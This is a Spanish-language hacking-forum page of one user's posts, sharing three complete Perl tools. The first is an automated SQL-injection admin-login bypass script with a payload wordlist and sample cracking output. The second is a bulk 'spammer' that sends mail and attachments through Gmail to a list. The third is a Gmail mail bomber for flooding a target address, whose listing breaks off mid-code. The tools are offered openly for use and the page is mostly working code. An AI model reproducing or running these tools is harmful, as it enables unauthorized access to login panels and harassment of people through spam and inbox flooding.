elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 55
371  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 19:38 pm
es lo que te habia dicho , para que el programa compruebe que realmente paso un bypass tiene tres opciones.

positivo : tenes que poner una porcion del texto que aparece cuando el login fue hecho ej "bienvenido administrador"

negativo : lo mismo que el positivo pero al contrario ej "acceso denegado"

automatico : una mala improvisacion mia , no la uses nunca xD.
372  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 16:25 pm
buena pregunta , nunca lo supe xDD.
373  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 16:14 pm
explorer ? , este programa nunca hubiera existido si vos no me hubieras ayudado , te pondria en los creditos pero se que estas cosas te disgustan xDD.
374  Programación / Scripting / Re: [Perl] ByPass Admin 0.1 en: 14 Marzo 2012, 14:09 pm
y si , es por eso que le puse 3 opciones para controlar eso (positivo,negativo,automatico).
La unica segura es la primera (positivo) que es cuando aparece (bienvenido admin).
375  Programación / Scripting / [Perl] ByPass Admin 0.1 en: 13 Marzo 2012, 18:50 pm
Acabo de terminar un programa que eh estado haciendo estos ultimos 3 dias , se trata de un script hecho en Perl para realizar los famosos y miticos bypass en los paneles de
administracion , lo bueno es que parsea todos los formularios encontrados en la pagina marcada para que todo sea mas automatico.

El programa depende de un archivo de texto llamado bypass.txt

Código:
admin'--
'or'1'='1
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1

El codigo (formateado con perltidy) es

Código
  1. #!usr/bin/perl
  2. #ByPass Admin 0.1
  3. #Coded By Doddy H
  4.  
  5. use LWP::UserAgent;
  6. use HTML::Form;
  7.  
  8. my $nave = LWP::UserAgent->new;
  9. $nave->agent(
  10. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  11. );
  12. $nave->timeout(5);
  13.  
  14. head();
  15. start();
  16. copyright();
  17.  
  18. sub start {
  19.     print "\n\n[+] Admin : ";
  20.     chomp( my $url = <STDIN> );
  21.  
  22.     my $code = toma($url);
  23.  
  24.     my @testar = HTML::Form->parse( $code, "/" );
  25.  
  26.     $count = 0;
  27.     foreach my $test (@testar) {
  28.         $count++;
  29.         print "\n\n -- == Form $count == --\n\n";
  30.         if ( $test->attr(name) eq "" ) {
  31.             print "[+] Name : No Found" . "\n";
  32.         }
  33.         else {
  34.             print "[+] Name : " . $test->attr(name) . "\n";
  35.         }
  36.         print "[+] Action : " . $test->action . "\n";
  37.         print "[+] Method : " . $test->method . "\n";
  38.         print "\n-- == Input == --\n\n";
  39.         @inputs = $test->inputs;
  40.  
  41.         foreach $in (@inputs) {
  42.  
  43.             print "\n[+] Type : " . $in->type . "\n";
  44.             print "[+] Name : " . $in->name . "\n";
  45.             print "[+] Value : " . $in->value . "\n";
  46.  
  47.         }
  48.     }
  49.  
  50.     print "\n\n[+] Form to crack : ";
  51.     chomp( my $op = <stdin> );
  52.  
  53.     print "\n[+] Submit : ";
  54.     chomp( my $aca = <stdin> );
  55.  
  56.     print "\n[+] Options to check\n\n";
  57.     print "1 - Positive\n";
  58.     print "2 - Negative\n";
  59.     print "3 - Automatic\n\n";
  60.     print "[+] Option : ";
  61.     chomp( my $op2 = <stdin> );
  62.  
  63.     my @bypass = loadword();
  64.  
  65.     if ( $op2 eq "1" ) {
  66.         print "\n[+] String : ";
  67.         chomp( my $st = <stdin> );
  68.         print "\n\n[+] Cracking login....\n\n";
  69.         for my $by (@bypass) {
  70.             chomp $by;
  71.             my $code = load( $url, $code, $op, $aca, $by );
  72.             if ( $code =~ /$st/ig ) {
  73.                 cracked( $url, $by );
  74.             }
  75.         }
  76.         print "\n[+] Finished\n";
  77.     }
  78.  
  79.     if ( $op2 eq "2" ) {
  80.         print "\n[+] String : ";
  81.         chomp( my $st = <stdin> );
  82.         print "\n\n[+] Cracking login....\n\n";
  83.         for my $by (@bypass) {
  84.             chomp $by;
  85.             my $code = load( $url, $code, $op, $aca, $by );
  86.             unless ( $code =~ /$st/ig ) {
  87.                 cracked( $url, $by );
  88.             }
  89.         }
  90.         print "\n[+] Finished\n";
  91.     }
  92.  
  93.     if ( $op2 eq "3" ) {
  94.         print "\n\n[+] Cracking login....\n\n";
  95.         my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" );
  96.         for my $by (@bypass) {
  97.             chomp $by;
  98.             my $code = load( $url, $code, $op, $aca, $by );
  99.             unless ( $code eq $prueba_falsa ) {
  100.                 cracked( $url, $by );
  101.             }
  102.         }
  103.         print "\n[+] Finished\n";
  104.     }
  105.  
  106. }
  107.  
  108. sub load {
  109.  
  110.     my ( $url, $code, $op, $aca, $text ) = @_;
  111.  
  112.     $op--;
  113.     my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];
  114.  
  115.     for my $testa (@probar) {
  116.         if ( $testa->method eq "POST" ) {
  117.  
  118.             my @inputs = $testa->inputs;
  119.             for my $in (@inputs) {
  120.                 if ( $in->type eq "submit" ) {
  121.                     if ( $in->name eq $aca ) {
  122.                         push( @botones_names,  $in->name );
  123.                         push( @botones_values, $in->value );
  124.                     }
  125.                 }
  126.                 else {
  127.                     push( @ordenuno, $in->name, $text );
  128.                 }
  129.             }
  130.  
  131.             my @preuno = @ordenuno;
  132.             push( @preuno, $botones_names[0], $botones_values[0] );
  133.             my $codeuno = $nave->post( $url, \@preuno )->content;
  134.  
  135.             return $codeuno;
  136.  
  137.         }
  138.         else {
  139.  
  140.             my $final    = "";
  141.             my $orden    = "";
  142.             my $partedos = "";
  143.  
  144.             my @inputs = $testa->inputs;
  145.             for my $testa (@inputs) {
  146.  
  147.                 if ( $testa->name eq $aca ) {
  148.  
  149.                     push( @botones_names,  $testa->name );
  150.                     push( @botones_values, $testa->value );
  151.                 }
  152.                 else {
  153.                     $orden .= '' . $testa->name . '=' . $text . '&';
  154.                 }
  155.             }
  156.             chop($orden);
  157.  
  158.             my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0];
  159.             my $final    = $url . "?" . $orden . $partedos;
  160.  
  161.             $codedos = toma($final);
  162.             return $codedos;
  163.         }
  164.     }
  165. }
  166.  
  167. sub cracked {
  168.     print "[+] Login Cracked\n\n";
  169.     print "[+] URL : $_[0]\n";
  170.     print "[+] Bypass : $_[1]\n";
  171.     savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
  172.     savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
  173.     copyright();
  174. }
  175.  
  176. sub loadword {
  177.  
  178.     my $file = "bypass.txt";
  179.  
  180.     if ( -f $file ) {
  181.  
  182.         open( FI, "bypass.txt" );
  183.         my @txts = <FI>;
  184.         close FI;
  185.         chomp @txts;
  186.  
  187.         return @txts;
  188.  
  189.     }
  190.     else {
  191.         print "\n\n[-] Wordlist not found\n\n";
  192.         copyright();
  193.     }
  194.  
  195. }
  196.  
  197. sub head {
  198.     print qq(
  199.  
  200.  @@@@        @@@@@                       @        @         @      
  201.  @   @       @    @                      @        @                
  202.  @   @       @    @                     @ @       @                
  203.  @   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@ 
  204.  @@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
  205.  @   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
  206.  @   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
  207.  @   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
  208.  @@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
  209.          @                                                         
  210.        @@                                                          
  211.  
  212.  
  213.  
  214. );
  215. }
  216.  
  217. sub copyright {
  218.     print "\n\n(C) Doddy Hackman 2012\n\n";
  219.     <stdin>;
  220.     exit(1);
  221. }
  222.  
  223. sub savefile {
  224.     open( SAVE, ">>" . $_[0] );
  225.     print SAVE $_[1] . "\n";
  226.     close SAVE;
  227. }
  228.  
  229. sub toma {
  230.     return $nave->get( $_[0] )->content;
  231. }
  232.  
  233. #The End ?
  234.  

Un ejemplo de uso

Código:


 @@@@        @@@@@                       @        @         @
 @   @       @    @                      @        @
 @   @       @    @                     @ @       @
 @   @  @  @ @    @  @@@   @@   @@      @ @    @@@@ @@@ @@  @ @ @@
 @@@@   @  @ @@@@@      @ @  @ @  @    @   @  @   @ @  @  @ @ @@  @
 @   @  @  @ @       @@@@  @    @      @   @  @   @ @  @  @ @ @   @
 @   @  @  @ @      @   @   @    @     @@@@@  @   @ @  @  @ @ @   @
 @   @   @@  @      @   @ @  @ @  @   @     @ @   @ @  @  @ @ @   @
 @@@@    @   @       @@@@  @@   @@    @     @  @@@@ @  @  @ @ @   @
         @
       @@





[+] Admin : http://localhost/labs/bypass/primero.php


 -- == Form 1 == --

[+] Name : No Found
[+] Action : /
[+] Method : POST

-- == Input == --


[+] Type : text
[+] Name : usuario
[+] Value :

[+] Type : password
[+] Name : password
[+] Value :

[+] Type : submit
[+] Name : logeo
[+] Value : Entrar


[+] Form to crack : 1

[+] Submit : logeo

[+] Options to check

1 - Positive
2 - Negative
3 - Automatic

[+] Option : 1

[+] String : exitoso


[+] Cracking login....

[+] Login Cracked

[+] URL : http://localhost/labs/bypass/primero.php
[+] Bypass : 'or'1'='1


(C) Doddy Hackman 2012
376  Programación / Scripting / Re: [Perl] DH Spammer 0.1 en: 5 Marzo 2012, 02:04 am
Cita de: H20-X en  4 Marzo 2012, 19:56 pm
que pena que no sea en py o en rb a mi en perl no me va :-\

al principio tenia pensado hacerlo en Python pero en Perl hay un modulo llamado Email::Send::SMTP::Gmail que me tiene todo el tema de envio de mails resumido.
377  Programación / Scripting / Re: [Perl] DH Spammer 0.1 en: 2 Marzo 2012, 19:23 pm
no se me habia ocurrido eso , gracias por la sugerencia.
378  Programación / Scripting / [Perl] DH Spammer 0.1 en: 1 Marzo 2012, 22:21 pm
Hola a todos , aca les traigo un programa que hice para mandar mails con las siguientes opciones.

  • Mensajes que permitan codigo HTML.
  • Adjuntar archivos
  • Mandar la cantidad que quieran
  • Se maneja con una lista de correos (para poder enviar el mismo mail a varios correos)

Para usarlo necesitan una cuenta Gmail para indicarle al programa que los mensajes van a ser enviados desde esa cuenta.

Una imagen del programa


El codigo (formateado con perltidy) es ...........

Código
  1. #!usr/bin/perl
  2. #DH Spammer 0.1
  3. #Coded By Doddy H
  4. #Dependencies
  5. #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
  6. #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
  7. #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
  8. #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
  9. #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
  10. #Based on http://robertmaldon.blogspot.com/2006/10/sending-email-through-google-smtp-from.html
  11.  
  12. use Tk;
  13. use Tk::ROText;
  14. use Tk::FileSelect;
  15. use Email::Send::SMTP::Gmail;
  16. use Net::SMTP::SSL;
  17. use Cwd;
  18.  
  19. if ( $^O eq 'MSWin32' ) {
  20.     use Win32::Console;
  21.     Win32::Console::Free();
  22. }
  23.  
  24. my $color_fondo = "black";
  25. my $color_texto = "white";
  26.  
  27. my $ve =
  28.   MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
  29. $ve->geometry("920x560+20+20");
  30. $ve->resizable( 0, 0 );
  31. $ve->title("DH Spammer 0.1 (C) Doddy Hackman 2012");
  32.  
  33. $d = $ve->Frame(
  34.     -relief     => "sunken",
  35.     -bd         => 1,
  36.     -background => $color_fondo,
  37.     -foreground => $color_texto
  38. );
  39. my $ma = $d->Menubutton(
  40.     -text             => "Mails",
  41.     -underline        => 1,
  42.     -background       => $color_fondo,
  43.     -foreground       => $color_texto,
  44.     -activebackground => $color_texto
  45. )->pack( -side => "left" );
  46. my $op = $d->Menubutton(
  47.     -text             => "Options",
  48.     -underline        => 1,
  49.     -background       => $color_fondo,
  50.     -foreground       => $color_texto,
  51.     -activebackground => $color_texto
  52. )->pack( -side => "left" );
  53. my $ab = $d->Menubutton(
  54.     -text             => "About",
  55.     -underline        => 1,
  56.     -background       => $color_fondo,
  57.     -foreground       => $color_texto,
  58.     -activebackground => $color_texto
  59. )->pack( -side => "left" );
  60. my $ex = $d->Menubutton(
  61.     -text             => "Exit",
  62.     -underline        => 1,
  63.     -background       => $color_fondo,
  64.     -foreground       => $color_texto,
  65.     -activebackground => $color_texto
  66. )->pack( -side => "left" );
  67. $d->pack( -side => "top", -fill => "x" );
  68.  
  69. $ma->command(
  70.     -label      => "Add Mailist",
  71.     -background => $color_fondo,
  72.     -foreground => $color_texto,
  73.     -command    => \&addmailist
  74. );
  75. $ma->command(
  76.     -label      => "Add Mail",
  77.     -background => $color_fondo,
  78.     -foreground => $color_texto,
  79.     -command    => \&addmail
  80. );
  81. $ma->command(
  82.     -label      => "Clean List",
  83.     -background => $color_fondo,
  84.     -foreground => $color_texto,
  85.     -command    => \&delist
  86. );
  87.  
  88. $op->command(
  89.     -label      => "Spam Now",
  90.     -background => $color_fondo,
  91.     -foreground => $color_texto,
  92.     -command    => \&spamnow
  93. );
  94. $op->command(
  95.     -label      => "Add Attachment",
  96.     -background => $color_fondo,
  97.     -foreground => $color_texto,
  98.     -command    => \&addfile
  99. );
  100. $op->command(
  101.     -label      => "Clean All",
  102.     -background => $color_fondo,
  103.     -foreground => $color_texto,
  104.     -command    => \&clean
  105. );
  106.  
  107. $ab->command(
  108.     -label      => "About",
  109.     -background => $color_fondo,
  110.     -foreground => $color_texto,
  111.     -command    => \&about
  112. );
  113. $ex->command(
  114.     -label      => "Exit",
  115.     -background => $color_fondo,
  116.     -foreground => $color_texto,
  117.     -command    => \&chali
  118. );
  119.  
  120. $ve->Label(
  121.     -text       => "Gmail Login",
  122.     -font       => "Impact3",
  123.     -background => $color_fondo,
  124.     -foreground => $color_texto
  125. )->place( -x => 100, -y => 40 );
  126.  
  127. $ve->Label(
  128.     -text       => "Username : ",
  129.     -background => $color_fondo,
  130.     -foreground => $color_texto
  131. )->place( -x => 20, -y => 80 );
  132. my $user = $ve->Entry(
  133.     -width      => 30,
  134.     -text       => 'lagartojuancho@gmail.com',
  135.     -background => $color_fondo,
  136.     -foreground => $color_texto
  137. )->place( -y => 83, -x => 85 );
  138.  
  139. $ve->Label(
  140.     -text       => "Password : ",
  141.     -background => $color_fondo,
  142.     -foreground => $color_texto
  143. )->place( -x => 20, -y => 120 );
  144. my $pass = $ve->Entry(
  145.     -show       => "*",
  146.     -width      => 30,
  147.     -text       => 'Secret',
  148.     -background => $color_fondo,
  149.     -foreground => $color_texto
  150. )->place( -y => 123, -x => 85 );
  151.  
  152. $ve->Label(
  153.     -text       => "Message",
  154.     -font       => "Impact3",
  155.     -background => $color_fondo,
  156.     -foreground => $color_texto
  157. )->place( -x => 110, -y => 160 );
  158.  
  159. $ve->Label(
  160.     -text       => "Number : ",
  161.     -background => $color_fondo,
  162.     -foreground => $color_texto
  163. )->place( -x => 20, -y => 210 );
  164. my $number = $ve->Entry(
  165.     -width      => 5,
  166.     -text       => "1",
  167.     -background => $color_fondo,
  168.     -foreground => $color_texto
  169. )->place( -x => 75, -y => 212 );
  170.  
  171. $ve->Label(
  172.     -text       => "Attachment : ",
  173.     -background => $color_fondo,
  174.     -foreground => $color_texto
  175. )->place( -x => 20, -y => 240 );
  176. my $fi = $ve->Entry(
  177.     -text       => 'None',
  178.     -width      => 30,
  179.     -background => $color_fondo,
  180.     -foreground => $color_texto
  181. )->place( -x => 90, -y => 242 );
  182.  
  183. $ve->Label(
  184.     -text       => "Subject : ",
  185.     -background => $color_fondo,
  186.     -foreground => $color_texto
  187. )->place( -x => 20, -y => 270 );
  188. my $tema = $ve->Entry(
  189.     -text       => "Hi idiot",
  190.     -width      => 20,
  191.     -background => $color_fondo,
  192.     -foreground => $color_texto
  193. )->place( -x => 73, -y => 273 );
  194.  
  195. $ve->Label(
  196.     -text       => "Body",
  197.     -font       => "Impact3",
  198.     -background => $color_fondo,
  199.     -foreground => $color_texto
  200. )->place( -x => 110, -y => 310 );
  201. my $body = $ve->Scrolled(
  202.     "Text",
  203.     -width      => 30,
  204.     -height     => 12,
  205.     -background => $color_fondo,
  206.     -foreground => $color_texto,
  207.     -scrollbars => "e"
  208. )->place( -x => 45, -y => 350 );
  209. $body->insert( "end", "Welcome to the hell" );
  210.  
  211. $ve->Label(
  212.     -text       => "Mailist",
  213.     -font       => "Impact3",
  214.     -background => $color_fondo,
  215.     -foreground => $color_texto
  216. )->place( -y => 40, -x => 400 );
  217. my $mailist = $ve->Listbox(
  218.     -height     => 31,
  219.     -width      => 33,
  220.     -background => $color_fondo,
  221.     -foreground => $color_texto
  222. )->place( -y => 85, -x => 330 );
  223.  
  224. $ve->Label(
  225.     -text       => "Console",
  226.     -font       => "Impact3",
  227.     -background => $color_fondo,
  228.     -foreground => $color_texto
  229. )->place( -y => 40, -x => 685 );
  230. my $console = $ve->Scrolled(
  231.     "ROText",
  232.     -width      => 40,
  233.     -height     => 31,
  234.     -background => $color_fondo,
  235.     -foreground => $color_texto,
  236.     -scrollbars => "e"
  237. )->place( -x => 580, -y => 84 );
  238.  
  239. MainLoop;
  240.  
  241. sub addmailist {
  242.  
  243.     my $adda = MainWindow->new(
  244.         -background => $color_fondo,
  245.         -foreground => $color_texto
  246.     );
  247.     $adda->geometry("400x90+20+20");
  248.     $adda->resizable( 0, 0 );
  249.     $adda->title("Add Mailist");
  250.  
  251.     $adda->Label(
  252.         -text       => "Mailist : ",
  253.         -background => $color_fondo,
  254.         -foreground => $color_texto,
  255.         -font       => "Impact1"
  256.     )->place( -x => 10, -y => 30 );
  257.     my $en = $adda->Entry(
  258.         -background => $color_fondo,
  259.         -foreground => $color_texto,
  260.         -width      => 33
  261.     )->place( -y => 33, -x => 75 );
  262.     $adda->Button(
  263.         -text             => "Browse",
  264.         -background       => $color_fondo,
  265.         -foreground       => $color_texto,
  266.         -width            => 7,
  267.         -activebackground => $color_texto,
  268.         -command          => \&brona
  269.     )->place( -y => 33, -x => 285 );
  270.     $adda->Button(
  271.         -text             => "Load",
  272.         -background       => $color_fondo,
  273.         -foreground       => $color_texto,
  274.         -width            => 7,
  275.         -activebackground => $color_texto,
  276.         -command          => \&bronaxa
  277.     )->place( -y => 33, -x => 340 );
  278.  
  279.     sub brona {
  280.         $browse = $adda->FileSelect( -directory => getcwd() );
  281.         my $file = $browse->Show;
  282.         $en->configure( -text => $file );
  283.     }
  284.  
  285.     sub bronaxa {
  286.         open( FILE, $en->get );
  287.         @words = <FILE>;
  288.         close FILE;
  289.  
  290.         for (@words) {
  291.             $mailist->insert( "end", $_ );
  292.         }
  293.     }
  294. }
  295.  
  296. sub addfile {
  297.  
  298.     my $addax = MainWindow->new(
  299.         -background => $color_fondo,
  300.         -foreground => $color_texto
  301.     );
  302.     $addax->geometry("390x90+20+20");
  303.     $addax->resizable( 0, 0 );
  304.     $addax->title("Add File");
  305.  
  306.     $addax->Label(
  307.         -text       => "File : ",
  308.         -background => $color_fondo,
  309.         -foreground => $color_texto,
  310.         -font       => "Impact1"
  311.     )->place( -x => 10, -y => 30 );
  312.     my $enaf = $addax->Entry(
  313.         -background => $color_fondo,
  314.         -foreground => $color_texto,
  315.         -width      => 33
  316.     )->place( -y => 33, -x => 55 );
  317.     $addax->Button(
  318.         -text             => "Browse",
  319.         -background       => $color_fondo,
  320.         -foreground       => $color_texto,
  321.         -width            => 7,
  322.         -activebackground => $color_texto,
  323.         -command          => \&bronax
  324.     )->place( -y => 33, -x => 265 );
  325.     $addax->Button(
  326.         -text             => "Load",
  327.         -background       => $color_fondo,
  328.         -foreground       => $color_texto,
  329.         -width            => 7,
  330.         -activebackground => $color_texto,
  331.         -command          => \&bronaxx
  332.     )->place( -y => 33, -x => 320 );
  333.  
  334.     sub bronax {
  335.         $browse = $addax->FileSelect( -directory => getcwd() );
  336.         my $filea = $browse->Show;
  337.         $enaf->configure( -text => $filea );
  338.     }
  339.  
  340.     sub bronaxx {
  341.         $fi->configure( -text => $enaf->get );
  342.     }
  343. }
  344.  
  345. sub addmail {
  346.  
  347.     my $add = MainWindow->new(
  348.         -background => $color_fondo,
  349.         -foreground => $color_texto
  350.     );
  351.     $add->geometry("350x90+20+20");
  352.     $add->resizable( 0, 0 );
  353.     $add->title("Add Mail");
  354.  
  355.     $add->Label(
  356.         -text       => "Mail : ",
  357.         -background => $color_fondo,
  358.         -foreground => $color_texto,
  359.         -font       => "Impact1"
  360.     )->place( -x => 10, -y => 30 );
  361.     my $ew = $add->Entry(
  362.         -background => $color_fondo,
  363.         -foreground => $color_texto,
  364.         -width      => 33
  365.     )->place( -y => 33, -x => 60 );
  366.     $add->Button(
  367.         -text             => "Add",
  368.         -background       => $color_fondo,
  369.         -activebackground => $color_texto,
  370.         -foreground       => $color_texto,
  371.         -width            => 7,
  372.         -command          => \&addnow
  373.     )->place( -y => 33, -x => 275 );
  374.  
  375.     sub addnow {
  376.         $mailist->insert( "end", $ew->get );
  377.     }
  378.  
  379. }
  380.  
  381. sub delist {
  382.     $mailist->delete( 0.0, "end" );
  383. }
  384.  
  385. sub spamnow {
  386.  
  387.     $console->delete( 0.1, "end" );
  388.  
  389.     my $control = "0";
  390.  
  391.     my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
  392.     if ( $msg->auth( $user->get, $pass->get ) ) {
  393.         $control = "1";
  394.     }
  395.     else {
  396.         $control = "0";
  397.     }
  398.     $msg->quit();
  399.  
  400.     if ($control) {
  401.  
  402.         $console->insert( "end", "[+] Starting the Party\n\n" );
  403.  
  404.         my @mails = $mailist->get( "0.0", "end" );
  405.         chomp @mails;
  406.         for my $mail (@mails) {
  407.             $ve->update;
  408.             $console->insert( "end", "[+] Mail : $mail\n" );
  409.  
  410.             my $text = $body->get( "1.0", "end" );
  411.  
  412.             if ( $fi->get eq "None" ) {
  413.                 singlemail( $user->get, $pass->get, $mail, $tema->get, $text,
  414.                     $number->get );
  415.             }
  416.             else {
  417.                 singlemailwithfile( $user->get, $pass->get, $mail, $tema->get,
  418.                     $text, $fi->get, $number->get );
  419.             }
  420.         }
  421.         $console->insert( "end", "\n\n[+] Finished" );
  422.     }
  423.     else {
  424.         $console->insert( "end", "[-] Bad Login\n" );
  425.     }
  426. }
  427.  
  428. sub singlemail {
  429.  
  430.     my ( $user, $password, $target, $asunto, $mensaje, $cantidad ) = @_;
  431.  
  432.     for ( 1 .. $cantidad ) {
  433.         my $msg = Net::SMTP::SSL->new( "smtp.gmail.com", Port => 465 );
  434.         $msg->auth( $user, $password );
  435.         $msg->mail( $user . "\n" );
  436.         $msg->to( $target . "\n" );
  437.         $msg->data();
  438.         $msg->datasend( "From: " . $user . "\n" );
  439.         $msg->datasend( "To: " . $target . "\n" );
  440.         $msg->datasend( "Subject: " . $asunto . "\n" );
  441.         $msg->datasend("Content-Type: text/html \n");
  442.         $msg->datasend("\n");
  443.         $msg->datasend( $mensaje . "\n" );
  444.         $msg->dataend();
  445.         $msg->quit();
  446.     }
  447. }
  448.  
  449. sub singlemailwithfile {
  450.  
  451.     my ( $user, $password, $target, $asunto, $mensaje, $file, $cantidad ) = @_;
  452.  
  453.     my $mail = Email::Send::SMTP::Gmail->new(
  454.         -smtp  => "gmail.com",
  455.         -login => $user,
  456.         -pass  => $password
  457.     );
  458.     for my $number ( 1 .. $cantidad ) {
  459.         $mail->send(
  460.             -to          => $target,
  461.             -subject     => $asunto,
  462.             -body        => $mensaje,
  463.             -attachments => $file
  464.         );
  465.     }
  466.     $mail->bye;
  467. }
  468.  
  469. sub clean {
  470.  
  471.     $user->configure( -text => " " );
  472.     $pass->configure( -text => " " );
  473.     $number->configure( -text => " " );
  474.     $fi->configure( -text => "None" );
  475.     $tema->configure( -text => " " );
  476.     $body->delete( 0.1, "end" );
  477.     $mailist->delete( 0.0, "end" );
  478.     $console->delete( 0.1, "end" );
  479.  
  480. }
  481.  
  482. sub about {
  483.     $about = MainWindow->new( -background => "black" );
  484.     $about->title("About");
  485.     $about->geometry("300x110");
  486.     $about->resizable( 0, 0 );
  487.     $about->Label( -background => "black", -foreground => "white" )->pack();
  488.     $about->Label(
  489.         -text       => "Contact : lepuke[at]hotmail[com]",
  490.         -font       => "Impact",
  491.         -background => "black",
  492.         -foreground => "white"
  493.     )->pack();
  494.     $about->Label(
  495.         -text       => "Web : doddyhackman.webcindario.com",
  496.         -font       => "Impact",
  497.         -background => "black",
  498.         -foreground => "white"
  499.     )->pack();
  500.     $about->Label(
  501.         -text       => "Blog : doddy-hackman.blogspot.com",
  502.         -font       => "Impact",
  503.         -background => "black",
  504.         -foreground => "white"
  505.     )->pack();
  506. }
  507.  
  508. sub chali { exit(1); }
  509.  
  510. #The End ?
  511.  
  512.  
379  Programación / Scripting / [Perl] Gmail Bomber 0.3 en: 23 Febrero 2012, 17:39 pm
Hola a todos , aca les traigo un gmail bomber que hice para el torneo de programacion de HackXCrack , se trata de un simple mail bomber para Gmail , aca les dejo una imagen del programa en uso donde me envio 40 mensajes a mi cuenta


Y mi casilla quedo asi


El codigo del programa (formateado con perltidy) es

Código
  1. #!usr/bin/perl
  2. #Gmail Bomber 0.2
  3. #Dependencies
  4. #http://search.cpan.org/~peco/Email-Send-SMTP-Gmail-0.24/lib/Email/Send/SMTP/Gmail.pm
  5. #http://search.cpan.org/~cwest/Net-SMTP-SSL-1.01/lib/Net/SMTP/SSL.pm
  6. #http://search.cpan.org/~sullr/IO-Socket-SSL-1.54/SSL.pm
  7. #ppm install http://www.open.com.au/radiator/free-downloads/Net-SSLeay.ppd
  8. #http://search.cpan.org/~gbarr/Authen-SASL-2.15/lib/Authen/SASL.pod
  9.  
  10. use Tk;
  11. use Win32;
  12. use Email::Send::SMTP::Gmail;
  13.  
  14. if ( $^O eq 'MSWin32' ) {
  15.     use Win32::Console;
  16.     Win32::Console::Free();
  17. }
  18.  
  19. my $color_fondo = "black";
  20. my $color_texto = "green";
  21.  
  22. my $ve =
  23.   MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
  24. $ve->geometry("300x600+20+20");
  25. $ve->resizable( 0, 0 );
  26. $ve->title("Gmail Bomber 0.2");
  27.  
  28. $ve->Label(
  29.     -text       => "Login",
  30.     -font       => "Impact3",
  31.     -background => $color_fondo,
  32.     -foreground => $color_texto
  33. )->place( -x => 110, -y => 30 );
  34.  
  35. $ve->Label(
  36.     -text       => "Username : ",
  37.     -background => $color_fondo,
  38.     -foreground => $color_texto
  39. )->place( -x => 20, -y => 80 );
  40. my $user = $ve->Entry(
  41.     -width      => 30,
  42.     -text       => 'lagartojuancho@gmail.com',
  43.     -background => $color_fondo,
  44.     -foreground => $color_texto
  45. )->place( -y => 83, -x => 85 );
  46.  
  47. $ve->Label(
  48.     -text       => "Password : ",
  49.     -background => $color_fondo,
  50.     -foreground => $color_texto
  51. )->place( -x => 20, -y => 120 );
  52. my $pass = $ve->Entry(
  53.     -show       => "*",
  54.     -width      => 30,
  55.     -text       => 'Secret',
  56.     -background => $color_fondo,
  57.     -foreground => $color_texto
  58. )->place( -y => 123, -x => 85 );
  59.  
  60. $ve->Label(
  61.     -text       => "Message",
  62.     -font       => "Impact3",
  63.     -background => $color_fondo,
  64.     -foreground => $color_texto
  65. )->place( -x => 110, -y => 160 );
  66.  
  67. $ve->Label(
  68.     -text       => "Number : ",
  69.     -background => $color_fondo,
  70.     -foreground => $color_texto
  71. )->place( -x => 20, -y => 210 );
  72. my $number = $ve->Entry(
  73.     -width      => 5,
  74.     -text       => "20",
  75.     -background => $color_fondo,
  76.     -foreground => $color_texto
  77. )->place( -x => 75, -y => 212 );
  78.  
  79. $ve->Label(
  80.     -text       => "Target : ",
  81.     -background => $color_fondo,
  82.     -foreground => $color_texto
  83. )->place( -x => 20, -y => 240 );
  84. my $to = $ve->Entry(
  85.     -text       => 'idiot@gmail.com',
  86.     -width      => 30,
  87.     -background => $color_fondo,
  88.     -foreground => $color_texto
  89. )->place( -x => 73, -y => 242 );
  90.  
  91. $ve->Label(
  92.     -text       => "Subject : ",
  93.     -background => $color_fondo,
  94.     -foreground => $color_texto
  95. )->place( -x => 20, -y => 270 );
  96. my $tema = $ve->Entry(
  97.     -text       => "Hi idiot",
  98.     -width      => 20,
  99.     -background => $color_fondo,
  100.     -foreground => $color_texto
  101. )->place( -x => 73, -y => 273 );
  102.  
  103. $ve->Label(
  104.     -text       => "Body",
  105.     -font       => "Impact3",
  106.     -background => $color_fondo,
  107.     -foreground => $color_texto
  108. )->place( -x => 110, -y => 310 );
  109. my $body = $ve->Text(
  110.     -width      => 30,
  111.     -height     => 12,
  112.     -background => $color_fondo,
  113.     -foreground => $color_texto
